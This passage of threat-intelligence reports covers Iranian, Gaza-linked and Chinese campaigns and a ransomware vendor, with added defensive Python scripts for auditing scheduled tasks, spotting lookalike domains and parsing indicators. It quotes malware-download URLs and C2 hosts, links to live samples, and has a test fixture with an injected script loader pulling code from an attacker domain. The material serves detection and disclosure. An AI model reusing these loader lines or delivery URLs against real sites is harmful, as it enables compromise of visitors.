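WRITABLE_MARKERS = ('\\users\\public\\', '\\programdata\\', '\\appdata\\', '\\temp\\', '\\downloads\\')


def tokens(cmdline):
    """Split a Windows command line, keeping backslashes and removing surrounding quotes."""
    try:
        return [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:                  # unbalanced quotes: fall back to a plain split
        return cmdline.split()


def parse_schtasks(cmdline):
    """Pull the switches that matter out of a schtasks command line."""
    toks = tokens(cmdline)
    lower = [t.lower() for t in toks]

    def value(switch):
        if switch in lower and lower.index(switch) + 1 < len(toks):
            return toks[lower.index(switch) + 1]
        return None

    return {
        'create': '/create' in lower,
        'force': '/f' in lower,
        'schedule': (value('/sc') or '').lower(),
        'modifier': value('/mo'),
        'task_name': value('/tn'),
        'action': value('/tr'),
    }


def reasons_for(parsed, max_minutes=5):
    """Rules that make a task creation suspicious; max_minutes is an assumed threshold."""
    reasons = []
    action = (parsed['action'] or '').lower()
    if action.endswith(SCRIPT_EXT):
        reasons.append('script_action')
    if any(marker in action for marker in WRITABLE_MARKERS):
        reasons.append('user_writable_path')
    mod = parsed['modifier']
    if parsed['schedule'] == 'minute' and mod and mod.isdigit() and int(mod) <= max_minutes:
        reasons.append('high_frequency')
    return reasons


def audit_schtasks(events):
    """Flag schtasks /create invocations that trigger at least one rule."""
    findings = []
    for ev in events:
        if not ev['image'].lower().endswith('\\schtasks.exe'):
            continue
        parsed = parse_schtasks(ev['cmdline'])
        if not parsed['create']:
            continue
        reasons = reasons_for(parsed)
        if reasons:
            findings.append({'task_name': parsed['task_name'],
                             'action': parsed['action'], 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for finding in audit_schtasks(SAMPLE_EVENTS):
        print(finding)
```

The task name mimics a Google updater, so match on the action path and schedule rather than on the name.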

Digitally signed malware

The entire bundle (VPN client and malware) was digitally signed with a valid code signing certificate issued by Symantec to AI Squared, a legitimate software company that develops accessibility software:

Thumbprint: F340C0D841F9D99DBC289151C13391000366631C
Serial number: 45 E4 7F 56 0B 01 B6 4E 68 39 5E 5D 79 2F 2E 09

Another Helminth sample, 1c23b3f11f933d98febfd5a92eb5c715, was signed with a different AI Squared code signing certificate:

Thumbprint: 92B8C0872BACDC226B9CE4D783D5CCAD61C6158A
Serial number:62 E0 44 E7 37 24 61 2D 79 4B 93 AF 97 46 13 48

This suggests that the attackers got hold of an AI Squared signing key, potentially after compromising the company’s network. Alternatively, the attackers might have got Symantec to issue them a certificate under AI Squared’s name.

University of Oxford impersonation

The attackers registered four domains impersonating The University of Oxford.

oxford-symposia[.]com is a fake Oxford conference registration website. Visitors are asked to download the “University Of Oxford Job Symposium Pre-Register Tool”:

The downloaded file (which is also signed with an AI Squared certificate) is a fake registration tool built by the attackers:

OxfordSymposiumRegTool.exe
f77ee804de304f7c3ea6b87824684b33

If run by the victim, their computer would get infected, while they are shown this registration process:

Note that after completing the “registration process”, the victim is asked to send the form to an email address in oxford-careers[.]com, which also belongs to the attackers.

Previously the fake website linked to the following documents in a third fake Oxford domain, oxford[.]in:

http://oxford[.]in/downloads/ls1.doc
http://oxford[.]in/downloads/ls2.doc
http://oxford[.]in/downloads/ls3.doc
http://oxford[.]in/downloads/ls4.do

The documents were unavailable during our research, and their content is unknown to us.

The attackers used a fourth domain, oxford-employee[.]com, to host an “Oxford Job application” website:

Visitors are asked to “Download CV Creator” in order “To Join University of Oxford staff”. CV Creator is a malicious file hosted at http://www.oxford-careers[.]com/Files/OxfordCVCreator.exe :

OxfordCVCreator.exe
5713c3c01067c91771ac70e193ef5419

When run, the victim is again presented with a tool created by the attackers, this time a “University Of Oxford Official CV Creator”:

Both samples mentioned in this section had the following domain used for command and control:

updater[.]li

Other incidents

In an earlier incident, the attackers sent a malicious Excel file impersonating Israir, an Israeli airline (the content of the file was copied from the company’s public website and we have no indication of it being compromised or targeted):

Israel Airline.xls
197c018922237828683783654d3c632a

The file had a macro that, if enabled by the user, would infect their computer.
In other incidents the attackers used the following files:
  • Special Offers.xls / Salary Employee 2016.xls
    f76443385fef159e6b73ad6bf7f086d6
  • pic.xls
    3a5fcba80c1fd685c4b5085d9d474118
  • People List.xls
    bd7d2efdb2a0f352c4b74f2b82e3c7bc
  • cv.xls
    72e046753f0496140b4aa389aee2e300
  • users.xls
    262bc259682cb48ce66a80dcc9a5d587
  • Employee Engagement Survey.xls
    726175e9aba421aa0f96cfc005664302
  • JuniperSetupClientInstaller.exe
    f8ce7e356e09de6a48dca9e51421b6f6
  • Project_Domain_No337.chm
    1792cdd0c5397ff5df445d73276d1a50 (undetected as malicious by any antivirus on VirusTotal)
  • gcaa_report_series15561.chm
    d50ab63f4034c6f5eb356e3326320e66 (undetected as malicious by any antivirus on VirusTotal)

Infrastructure overlap with Cadelle and Chafer

In December 2015, Symantec published a post about “two Iran-based attack groups that appear to be connected, Cadelle and Chafer” that “have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations”.

Backdoor.Remexi, one of the malware families used by Chafer, had the following command and control host:

87pqxz159.dockerjsbin[.]com

Interestingly, IP address 83.142.230.138, which served as a command and control address for an OilRig related sample (3a5fcba80c1fd685c4b5085d9d474118), was also pointed to by 87pqxz159.dockerjsbin[.]com.

This suggests that the two groups may actually be the same entity, or that they share resources in one way or another.

Indicators of compromise

Indicators file: oilrig-indicators.csv (also available on PassiveTotal)

The graph below depicts the OilRig infrastructure (click to enlarge):

Acknowledgments

This research was facilitated by PassiveTotal for threat infrastructure analysis, and by MalNet for malware research . We would like to thank White-Hat, Tom Lancaster of Palo Alto Networks, Michael Yip of Stroz Friedberg, security researcher Marcus, and other security researchers and organizations who shared information and provided feedback.

Operation Electric Powder – Who is targeting Israel Electric Company?


Attackers have been trying to breach IEC (Israel Electric Company) in a year-long campaign.

From April 2016 until at least February 2017, attackers have been spreading malware via fake Facebook profiles and pages, breached websites, and self-hosted and cloud based websites. Various artifacts indicate that the main target of this campaign is IEC – Israel Electric Company. These include domains, file names, Java package names, and Facebook activity. We dubbed this campaign “Operation Electric Powder”.

Israel Electric Company (also known as Israel Electric Corporation) “is the largest supplier of electrical power in Israel. The IEC builds, maintains, and operates power generation stations, sub-stations, as well as transmission and distribution networks. The company is the sole integrated electric utility in the State of Israel. Its installed generating capacity represents about 75% of the total electricity production capacity in the country.”

It is notable that the operational level and technological sophistication of the attackers are not high. They also have a hard time preparing decoy documents and websites in Hebrew and English. Therefore, in most cases a vigilant target should be able to notice the attack and avoid infection. We have no indication that the attacks succeeded in infecting IEC related computers or stealing information.

Currently we do not know who is behind Operation Electric Powder or what its objectives are. See further discussion in the Attribution section.

Impersonating Israeli news site

The attackers registered and used in multiple attacks the domain ynetnewes[.]com (note the extra e). This domain impersonates ynetnews.com, the English version of ynet.co.il – one of Israel’s most popular news sites.

Certain pages within the domain would load the legitimate Ynet website:

Others, which are opened as decoy during malware infection, had copied content from a different news site:

The URL ynetnewes[.]com/video/Newfilm.html contained an article about Brad Pitt and Marion Cotillard copied from another site. At the bottom was a link saying “Here For Watch It !”:

The link pointed to goo[.]gl/zxhJxu (Google’s URL shortening service). According to the statistics page, it had been created on September 25, 2016 and had been clicked only 11 times. When clicked, it would redirect to iecr[.]co/info/index_info.php.

We do not know what the content at the final URL was. We estimate that it served malware. The domain iecr[.]co was used as a command and control server for other malware in this campaign.

Another URL, http://ynetnewes[.]com/resources/assets/downloads/svchost.exe, hosted a malware file called program_stream_film_for_watch.exe (d020b08f5a6aef1f1072133d11f919f8).

Fake Facebook profile – Linda Santos

One of the above mentioned malicious URLs was spread via comments by a fake Facebook profile – Linda Santos (no longer available):

In September 2016, the fake profile commented on posts by Israel Electric Company:

The profile had dozens of friends, almost all were IEC employees:

The fake profile was following only three pages, one of which was the IEC official page:

Pokemon Go Facebook page

In July 2016, when mobile game “Pokemon Go” was at the peak of its popularity, the attackers created a Facebook page impersonating the official Pokemon Go page:

The page, which is no longer available, had about one hundred followers – most were Arab Israelis and some were Jewish Israelis.

Only one post was published, with text in English and Hebrew. Grammatical mistakes indicate the attackers are not native speakers of either language:

The post linked to a malicious website hosted in yolasite.com (which is a legitimate website building and hosting platform):

pokemonisrael.yolasite[.]com

The button – “להורדה טלפון ומחשב” (literal translation – “To download phone and computer”) linked to a zip file in another website:

http://iec-co-il[.]com/iec/electricity/Pokemon-PC.zip

Note that the domain being impersonated is that of Israel Electric Company’s website (iec.co.il).

Pokemon-PC.zip (40303cd6abe7004659ca3447767e4eb7) contained Pokemon-PC.exe (e45119a72677ed15ee0f04ef936a9803), which at run time drops monitar.exe  (d3e0b129bad263e6c0dcb1a9da55978b):

Android phone malware

The attackers also distributed a malicious app for Android devices – pokemon.apk (3137448e0cb7ad83c433a27b6dbfb090). This malware also had characteristics that impersonate IEC, such as the package name:

The application is a dropper that extracts and installs a spyware. The dropper does not ask for any permission during installation:

However, when the spyware is installed, it asks for multiple sensitive permissions:

The victim ends up with two applications installed on their device. The Dropper, pretending to be a Pokemon Go app, adds an icon to the phone dashboard. However, it does not have any functionality, and when clicked, this error message is displayed:

Error 505
Sorry, this version is not compatible with your android version.

The dropper does not really check which Android version is installed:

The message is intended to make the victim believe that the Pokemon game does not work because of compatibility issues.

The victim is likely to uninstall the application at this point. However, because a second application was installed, the phone would stay infected unless it is uninstalled as well.

Websites for Malware distribution

Malware was also hosted in legitimate breached Israeli websites, such as this educational website:

http://www.bagrut3.org[.]il/upload/edu_shlishit/passwordlist.exe (defc340825cf56f18b5ba688e6695e68)

and a small law firm’s website:

http://sheinin[.]co.il/MyPhoto.zip (650fcd25a917b37485c48616f6e17712)

In journey-in-israel[.]com, the attackers inserted exploit code for CVE-2014-6332 – a Windows code execution vulnerability. The exploit was copied from an online source, likely from here, as the code included the same comments. The website also hosted this malware: afd5288d9aeb0c3ef7b37becb7ed4d5c.

In other cases, the attackers registered and built malicious websites: users-management[.]com and sourcefarge[.]net (similar to legitimate software website sourceforge.net). The latter was redirecting to journey-in-israel[.]com and iec-co-il[.]com in May and July 2016, according to PassiveTotal:

Sample 24befa319fd96dea587f82eb945f5d2a, potentially only a test file, is a self-extracting archive (SFX) that contains two files: a legitimate Putty installation and link.html: 

When run, while PuTTY is installed, the HTML file is opened in a browser and redirects to http://tinyurl[.]com/jerhz2a and then to http://users-management[.]com/info/index_info.php?id=9775. The last page then 302-redirects to the website of Mafil, an Israeli office supply company:

Sample f6d5b8d58079c5a008f7629bdd77ba7f, also a self-extracting archive, contained a decoy PDF document and a backdoor:

The PDF, named IEC.pdf, is a warranty document taken from Mafil’s public website. It is displayed to the victim while the malware (6aeb71d05a2f9b7c52ec06d65d838e82) infects their computer:

Windows Malware

The attackers developed three malware types for Windows based computers:

  • Dropper – self-extracting archives that extract and run the backdoor, sometimes while opening a decoy PDF document or website.
    (For example: 6fa869f17b703a1282b8f386d0d87bd4)
  • Trojan backdoor / downloader – malware that collects information about the system and can download and execute other files. (909125d1de7ac584c15f81a34262846f)
    Some samples had two hardcoded command and control servers: iecrs[.]co and iecr[.]co (note once again the use of IEC in the domain name).
  • Keylogger / screen grabber – records keystrokes and takes screenshots. The malware file is compiled Python code. (d3e0b129bad263e6c0dcb1a9da55978b)

An analysis of the malware and other parts of the campaign was published by McAfee on November 11, 2016.

The latest known sample in this campaign (7ceac3389a5c97a3008aae9a270c706a) has a compilation timestamp of February 12, 2017. It is dropped when “pdf file products israel electric.exe” (c13c566b079258bf0782d9fb64612529) is executed.

Attribution

In a report that covers other parts of the campaign, McAfee attributes it to Gaza Cybergang (AKA Gaza Hacker Team AKA Molerats). However, the report does not present strong evidence to support this conclusion.

While initially we thought the same, currently we cannot relate Operation Electric Powder to any known group. Moreover, besides Mohammed potentially being the name of the malware developer (based on a PDB string found in multiple samples: C:\Users\Mohammed.MU\Desktop\AM\programming\C\tsDownloader\Release\tsDownloader.pdb), we do not have evidence that the attackers are Arabs.

Indicators of compromise

  • Indicators file:  Operation-Electric-Powder-indicators.csv (also available on PassiveTotal).
    Notably, all but one of the IP addresses in use by the attackers belong to German IT services provider “Accelerated IT Services GmbH” (AS31400):
    84.200.32.211
    84.200.2.76
    84.200.17.123
    84.200.68.97
    82.211.30.212
    82.211.30.186
    82.211.30.192
  • Florian Roth shared a Yara rule to detect the downloader: Operation-Electric-Powder-yara.txt
  • The graph below depicts the campaign infrastructure (click the image to see the full graph):
  • Live samples can be downloaded from the following link:
    https://ln.sync[.]com/dl/30e722bf0#f72zgiwk-zxcp3e9t-fa9jyakr-zpbf5hgg
    (Please email info@clearskysec.com to get the password.)

Acknowledgments

This research was facilitated by PassiveTotal for threat infrastructure analysis, and by MalNet for malware research.

Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten


On 29 March 2017 the German Federal Office for Information Security (BSI) said in a statement that the website of Israeli newspaper Jerusalem Post was manipulated and linked to a harmful third party. Below is a Google translation of the statement:

“After the cyber attack on the German Bundestag in 2015, some protective functions that the BSI has established for government networks have also been adopted by the German Bundestag for its own networks. Since the beginning of January 2017, the BSI, as the national cyber security agency, has been in close contact with the German Bundestag, due to the network traffic of the German Bundestag. At the request of the German Bundestag the BSI analyzed these problems in network traffic. The technical analyzes have been completed. The website of the Jerusalem Post was manipulated and linked to a harmful third party. Within the framework of the analyzes, however, the BSI has not discovered any malicious software; infections are also not known to the BSI.”

As part of our monitoring of Iranian threat agents’ activities, we have detected that from October 2016 until the end of January 2017, the Jerusalem Post, as well as multiple other Israeli websites and one website in the Palestinian Authority, were compromised by Iranian threat agent CopyKittens. Based on the time-frame and nature of the compromises, we estimate with high certainty that the statement by the German Federal Office for Information Security refers to the same incidents.

Watering hole attacks

In each of the compromised websites, the attackers inserted a single line of JavaScript code into an existing JavaScript library (a local library, loaded from the server hosting the compromised website). This code loaded further JavaScript from a malicious domain owned by the attackers:

jguery[.]net

Specifically from this URL: https://js.jguery[.]net/jquery.min.js

Note that the domain is intentionally impersonating jquery.com, a legitimate and unrelated domain used by jQuery, one of the most prevalent JavaScript libraries.

Below are screenshots of the infected websites’ source code showing jguery[.]net being loaded (click images to enlarge).

Jerusalem post website (www.jpost.com):

Maariv – website of a national daily newspaper published in Israel (www.maariv.co.il)

The Israeli Defense Force Disabled Veterans Organization website (inz.org.il)

The Palestinian Ministry of Health (www.moh.gov.ps)
(loaded from a similar malicious domain – jguery[.]online):

The student personal info log-in page of Tel Aviv University (www.ims.tau.ac.il)
This was captured by PassiveTotal, as can be seen in the screenshot below or in the following analysis page: https://passivetotal.org/search/jguery.net.

By the time we examined the website the malicious code was removed.

Javascript payload

As can be seen in this public analysis, the malicious JavaScript payload loaded from jguery[.]net and jguery[.]online was BeEF, The Browser Exploitation Framework Project, an open source “penetration testing tool that focuses on the web browser”.

The JavaScript payload was not served to each and every visitor of the infected websites. Based on our analysis and other indications, we estimate that the attackers used whitelisting, likely based on source IP. This means that only specific targets would be affected and potentially compromised. However, because we did not have access to the servers hosting the malicious JavaScript payload, we do not know the exact logic by which it was served.

Source of the compromise?

While monitoring online hacking communities, we identified that in October 2016 an actor sold access to the management panel of a server belonging to an Israeli hosting company. This server hosted the Jerusalem Post and Maariv, among other websites.

We estimate with medium certainty that the attackers bought access to the server in order to deploy the malicious code.

Indicators of compromise

Indicators file:  copykittens-indicators-March-2017.csv (also available on PassiveTotal).

Other parts of this campaign were revealed recently by Domaintools.

Domains in use by CopyKittens:

1e100[.]tech
1m100[.]tech
ads-youtube[.]online
akamaitechnology[.]com
alkamaihd[.]net
azurewebsites[.]tech
broadcast-microsoft[.]tech
chromeupdates[.]online
cloudmicrosoft[.]net
dnsserv[.]host
elasticbeanstalk[.]tech
fdgdsg[.]xyz
jguery[.]net
jguery[.]online
js[.]jguery[.]online
microsoft-ds[.]com
microsoft-security[.]host
nameserver[.]win
newsfeeds-microsoft[.]press
owa-microsoft[.]online
primeminister-goverment-techcenter[.]tech
qoldenlines[.]net
sharepoint-microsoft[.]co
ssl-gstatic[.]online
static[.]primeminister-goverment-techcenter[.]tech
trendmicro[.]tech
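As an added example, not from the ClearSky report, the following Python script does two things a defender can do with the watering-hole details and the domain list above: it pulls every absolute URL out of a site-local JavaScript file and flags hosts that imitate a known name (the single injected line loading js.jguery[.]net is the pattern described in the watering hole section), and it runs the same lookalike check over the listed CopyKittens domains. The brand reference set, the sample JavaScript, and the function names are assumptions made for this illustration; the malicious URL in the sample is the one quoted above, defanged.

```python
import re
from urllib.parse import urlparse

# Legitimate names the domains above imitate (assumed reference set; extend
# with whatever your own sites actually load from).
BRANDS = {
    "1e100.net", "akamaihd.net", "azurewebsites.net", "elasticbeanstalk.com",
    "gstatic.com", "jquery.com", "microsoft.com", "trendmicro.com",
}

URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def refang(value: str) -> str:
    """Turn the report's defanged notation back into a real name/URL."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def registrable(host: str):
    """(second-level label, TLD). Simplification: public suffixes such as
    co.uk are not handled, which is good enough for the names in this report."""
    parts = host.lower().rstrip(".").split(".")
    if len(parts) < 2:
        return parts[0], ""
    return parts[-2], parts[-1]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert/delete/substitute) between two labels."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host: str):
    """Reason string if host looks like a brand impersonation, else None."""
    label, tld = registrable(refang(host))
    if f"{label}.{tld}" in BRANDS:
        return None  # the genuine name, or a subdomain of it
    for brand in sorted(BRANDS):  # sorted so the first match is deterministic
        blabel, btld = registrable(brand)
        if label == blabel:
            return f"brand label '{blabel}' on unexpected TLD .{tld}"
        if edit_distance(label, blabel) <= 1:
            return f"one edit away from '{blabel}'"
        if blabel in label:
            return f"embeds brand '{blabel}'"
    return None


def scan_source(text: str):
    """Find every absolute URL in a JS/HTML file and report lookalike hosts."""
    findings = []
    for url in URL_RE.findall(refang(text)):
        reason = classify(urlparse(url).hostname or "")
        if reason:
            findings.append((url, reason))
    return findings


# Constructed: tail of a site-local jQuery build with one injected loader line
# (the malicious URL is the one quoted in the report, defanged) beside a
# genuine CDN reference that must not be flagged.
SAMPLE_JS = (
    "jQuery.fn.extend({ready:function(f){return f()}});\n"
    "var s=document.createElement('script');"
    "s.src='https://js.jguery[.]net/jquery.min.js';document.head.appendChild(s);\n"
    "var t=document.createElement('script');"
    "t.src='https://code.jquery.com/jquery-3.1.1.min.js';document.head.appendChild(t);\n"
)

# A few of the CopyKittens domains listed above, plus one that is no lookalike.
COPYKITTENS_DOMAINS = [
    "1e100[.]tech", "1m100[.]tech", "alkamaihd[.]net", "ssl-gstatic[.]online",
    "microsoft-ds[.]com", "jguery[.]online", "fdgdsg[.]xyz",
]


def flag_lookalikes(domains):
    return {d: classify(d) for d in domains if classify(d)}


if __name__ == "__main__":
    for url, why in scan_source(SAMPLE_JS):
        print(f"{url}: {why}")
    for d, why in flag_lookalikes(COPYKITTENS_DOMAINS).items():
        print(f"{d}: {why}")
```

Running the scanner over the actual JavaScript files a site serves (not only its HTML) is the point: the injection described above lived inside an existing library, where a check that only inspects script tags in the page markup would never see it. Names such as fdgdsg[.]xyz carry no brand to imitate, so this heuristic does not flag them; they are caught by the indicator list, not by lookalike logic.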

Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA


Over the past few months ClearSky has been collaborating with Palo Alto Networks on preventing and detecting targeted attacks in the Middle East using two relatively new Microsoft Windows malware families which we call KASPERAGENT and MICROPSIA. In addition, our research has uncovered evidence of links between attacks using these two new malware families and two families of Google Android malware we are calling SECUREUPDATE and VAMP.

Read the full report at Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA.


The Rainmaker, Philadelphia and Stampado Ransomware Vendor is Expanding his Services


ClearSky conducts consistent monitoring of various Darknet actors and communities, including specific actors that develop and sell malware, exploits, bots and ransomware.

We have recently encountered a very aggressive Jabber spam campaign advertising the “Philadelphia” ransomware.

As Brian Krebs wrote in one of his recent posts, Philadelphia is a ransomware-as-a-service crimeware package that is sold for roughly $400 to would-be cyber criminals who dream of carving out their own ransomware empires. Philadelphia has many features, including the ability to generate PDF reports and charts of victims to track the campaigns, as well as the ability to plot victims around the world using Google Maps.[1]

This is a screenshot of the jabber spam campaign:

In his post from March, Brian Krebs described the highly professional YouTube movie[2] advertising this Ransomware.

In addition to this movie, a professional and well-designed website was created by the Philadelphia vendor in February 2017:


This website advertises both the Philadelphia and Stampado ransomware, but also advertises other services and tools provided by the same person:

  1. CyanoBinder – a file joiner that joins multiple files into a single executable file (the price is $14 for an unlimited license)
  2. SkypeBomber – a tool that conducts phone DDoS, using Skype to call a specific number repeatedly (the price is $29 for an unlimited license)
  3. V-Eye – a RAT that includes a keylogger that collects passwords, and can control the mouse, watch the webcam or desktop, send and retrieve files and more (the price is $239 for an unlimited license)
  4. RemoTV – an application that bundles and opens a hidden modified TeamViewer application on a machine and sends the credentials to the operator (the price is $49 for an unlimited license)
  5. Mailer – a PHP script that sends e-mails to multiple addresses at once (the price is $9 for an unlimited license)

In comparison to other vendors in cybercrime markets, the prices are relatively low.

While checking the registration information of the domain of the “store”, we were able to find traces of other activities of this malware provider that allow us to connect him to Brazil.

The common assumption until now was that the vendor behind the Philadelphia ransomware[3] is a Russian cybercriminal. But based on these findings, and the fact that the vendor’s communication language in one of the main Russian cybercrime forums is English, we can assume that the vendor is potentially Brazilian.

The diagram below shows the connections we uncovered between the registrant information behind the website:

As we can see in the above diagram, using PassiveTotal with a reverse WHOIS search on the registrant e-mail (rubens_alexandre_mar@hotmail.com), during 2016 he registered 4 other domain names, three of them with the name Viracopos:

Viracopos is an international airport in São Paulo, Brazil, which has a legitimate website under the domain viracopos.com. So we can assume that in 2016 the malware vendor conducted some kind of phishing activity connected to the Viracopos airport.

Below is the registration information for the above domain names; as we can see, legitimate people’s names were used:

Rainer Brust details:

Rita J Kula details:

Pivoting on the IP on which the vendor’s main website is hosted, we found a mirror of the main website that was registered in May 2016 and was active until last week:

This phone number (as well as the registrant name and e-mail) is connected to a huge network of more than 1000 domains that were registered during 2016 and are unavailable now.

Using the DomainTools Risk Score engine we can see that, with high probability, all those domains were malicious:


Checking the registrant e-mail (rajsingh01114@gmail.com), we also see 490 abuse reports against domain names registered with this e-mail[4]:


Conclusions

From this research we can learn the following:

  1. The Philadelphia vendor is expanding his activity and investing a lot of effort in marketing.
  2. During 2016 this vendor ran a huge network of malicious websites, and probably conducted specific phishing activity connected to Viracopos airport.
  3. We assume, with high probability, that the malware vendor of Philadelphia is not Russian; we assess with moderate probability that the vendor is Brazilian.


Indicators of compromise 

viracopos.me
viracopos.club
viracopos.biz
whitecor.com
80.82.69.139
rubens_alexandre_mar@hotmail.com
rajsingh01114@gmail.com
918989616042


[1] https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/

[2] https://www.youtube.com/watch?v=5WJ2KHoo5Fo

[3] https://blog.vadesecure.com/en/raas-ransomware-as-a-service/

[4] http://knujon.com/owners/rajsingh01114@gmail_com.html


Recent Winnti Infrastructure and Samples


On July 17, 2017, we detected a malicious document in VirusTotal exploiting CVE-2017-0199. By pivoting off of the infrastructure we learned that it is related to Winnti, a Chinese threat actor that is mostly targeting the gaming industry. Below we outline initial findings.

The malicious file, named curriculum vitae.rtf (58c66b3ddbc0df9810119bb688ea8fb0) was uploaded from Turkey. Its content is presented below (we redacted personally identifiable information):

When the document is opened, it downloads and runs a file from the following URL:

http://54.245.195[.]101/test.rtf

This file contains a short VBS script:

The script downloads and runs an executable (a4b2a6883ba0451429df29506a1f6995) from the following URL:

http://54.245.195[.]101/shell.exe

The executable uses backup.aolonline[.]cc as its command and control server.

Indicators of compromise

Pivoting on IPs, code signing certificates, and domain registration details, we found further parts of the infrastructure, some going back to 2015. Most of them have been tagged as relating to “Casper aka LEAD” in a public PassiveTotal project by Cylance (however, we could not find a public report). Most samples were detected by Proofpoint as “ETPRO TROJAN Casper/LEAD DNS Lookup” (this signature was published on May 03, 2017).

The Maltego graph below depicts the relationship among the indicators (click to enlarge):

Domain googlesoftservice[.]net
Domain igooglefiles[.]com
Domain aolonline[.]cc
Domain facebooknavigation[.]com
Domain googlecustomservice[.]com
Domain find2find[.]com
Domain tiwwter[.]net
Domain luckhairs[.]com
Domain googlerenewals[.]net
Domain pornsee[.]tv
EmailAddress YYTXCONNECTICUT@GMAIL.COM
EmailAddress SUNWARE1@AOL.COM
EmailAddress LILEMINNESOTA@HOTMAIL.COM
EmailAddress DSFSAF@GMAIL.COM
EmailAddress 13836469977@139.com
EmailAddress FUCKCCDDEEFFF@GMAIL.COM
Filename NSLS.dll
Filename HelpPane.exe
Filename nsls.dll
Filename conf.exe
Filename msimain17.sdb
Filename shell.exe
Filename 715578187~.exe
Filename COMSysAppLauncher.exe
Filename SysAppLauncher.dll
Filename curriculumvitae.rtf
Filename cryptbase.exe
Filename sign.exe
Filename mess.exe
Filename cryptbasesvc.dll
Filename video(20170201)_2.exe
Filename cryptbase.dll
Filename COMSystemApplicationLauncher.dll
Hash 09ec3b13ee8c84e07f5c55b0fa296e40
Hash d8cc0485a7937b28fc242fbc69331014
Hash 5096b87a9dec78f9027dec76a726546d
Hash e4c5cb83ae9c406b4191331ef5bef8ff
Hash 32c0c3bfa07220b489d8ff704be21acc
Hash 82496f6cede2d2b8758df1b6dc5c10a2
Hash 27491f061918f12dcf43b083558f4387
Hash 58c66b3ddbc0df9810119bb688ea8fb0
Hash a4b2a6883ba0451429df29506a1f6995
Hash e88f812a30cfb9fc03c4e41be0619c98
Hash f4da908122d8e8f9af9cf4427a95dd79
IPv4Address 180.150.226.207
IPv4Address 103.86.84.124
IPv4Address 61.33.155.97
IPv4Address 103.212.222.86
IPv4Address 42.236.84.118
IPv4Address 14.33.133.78
IPv4Address 45.77.3.152
IPv4Address 54.245.195.101
IPv4Address 45.77.6.44
URL http://54.245.195[.]101/sign.exe
URL http://54.245.195[.]101/test.rtf
URL http://54.245.195[.]101/shell.exe
URL http://54.245.195[.]101/mess.exe
URL http://signup.facebooknavigation[.]com/
Host mess[.]googlerenewals[.]net
Host us[.]igooglefiles[.]com
Host signup[.]facebooknavigation[.]com
Host bot[.]new[.]googlecustomservice[.]com
Host jp[.]googlerenewals[.]net
Host xn--360tmp-k02m[.]new[.]googlecustomservice[.]com
Host cdn[.]igooglefiles[.]com
Host xn--360tmp-k02m[.]tmp[.]googlecustomservice[.]com
Host xn--360tmp-k02m[.]www[.]googlecustomservice[.]com
Host ftp[.]googlecustomservice[.]com
Host game[.]googlecustomservice[.]com
Host www[.]googlecustomservice[.]com
Host new[.]googlecustomservice[.]com
Host bot[.]googlecustomservice[.]com
Host vnew[.]googlecustomservice[.]com
Host tmp[.]googlecustomservice[.]com
Host xn--360tmp-k02m[.]googlecustomservice[.]com
Host hk[.]uk[.]igooglefiles[.]com
Host us[.]uk[.]igooglefiles[.]com
Host www[.]uk[.]igooglefiles[.]com
Host lead1[.]uk[.]igooglefiles[.]com
Host cdn[.]uk[.]igooglefiles[.]com
Host show[.]uk[.]igooglefiles[.]com
Host uk[.]uk[.]igooglefiles[.]com
Host news[.]googlesoftservice[.]net
Host news[.]facebooknavigation[.]com
Host backup[.]aolonline[.]cc
Host uk[.]igooglefiles[.]com
Host news[.]aolonline[.]cc


The indicators are available on PassiveTotal.
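The indicator list above is a flat “Type Value” dump with defanged names. As an added example (not ClearSky’s code, nor PassiveTotal’s export format), here is a small Python parser that turns such a list into validated, de-duplicated, per-type buckets and derives a DNS/proxy deny list from the host-like entries. The sample input is a constructed slice of the list above with deliberate repeats, one mixed-case hash, one malformed IP and one junk hash, to exercise the checks; the function names are assumptions made for this illustration.

```python
import ipaddress
import re
from typing import NamedTuple
from urllib.parse import urlparse

MD5_RE = re.compile(r"^[0-9a-f]{32}$")


class ParseResult(NamedTuple):
    indicators: dict   # type -> list of unique canonical values, first-seen order
    errors: list       # (line number, message) for lines that were rejected
    duplicates: int    # lines dropped because the same value was already seen


def refang(value: str) -> str:
    return value.replace("[.]", ".").replace("hxxp", "http")


def canonical(kind: str, value: str) -> str:
    """Normalize one value so duplicates with cosmetic differences collapse.
    Raises ValueError when the value is not valid for its type."""
    value = refang(value.strip())
    if kind == "Hash":
        value = value.lower()
        if not MD5_RE.match(value):
            raise ValueError("not a 32-hex-digit MD5")
    elif kind == "IPv4Address":
        value = str(ipaddress.IPv4Address(value))  # raises ValueError if malformed
    elif kind in ("Domain", "Host", "EmailAddress"):
        value = value.lower().rstrip(".")
    elif kind == "URL":
        if not urlparse(value).hostname:
            raise ValueError("URL without a host")
    elif kind != "Filename":
        raise ValueError(f"unknown indicator type {kind!r}")
    return value


def parse_indicators(text: str) -> ParseResult:
    """Parse 'Type Value' lines, the layout of the list above."""
    indicators, errors, duplicates = {}, [], 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            errors.append((lineno, "expected '<Type> <value>'"))
            continue
        kind, value = parts
        try:
            value = canonical(kind, value)
        except ValueError as exc:
            errors.append((lineno, str(exc)))
            continue
        bucket = indicators.setdefault(kind, [])
        if value in bucket:
            duplicates += 1
        else:
            bucket.append(value)
    return ParseResult(indicators, errors, duplicates)


def network_blocklist(result: ParseResult):
    """Every host-like value (domains, hosts, URL hosts, IPs), sorted, for a
    DNS sinkhole or proxy deny list."""
    names = set(result.indicators.get("Domain", [])) | set(result.indicators.get("Host", []))
    names |= {urlparse(u).hostname for u in result.indicators.get("URL", [])}
    names |= set(result.indicators.get("IPv4Address", []))
    return sorted(names)


# Constructed test input: a slice of the list above, with deliberate repeats, a
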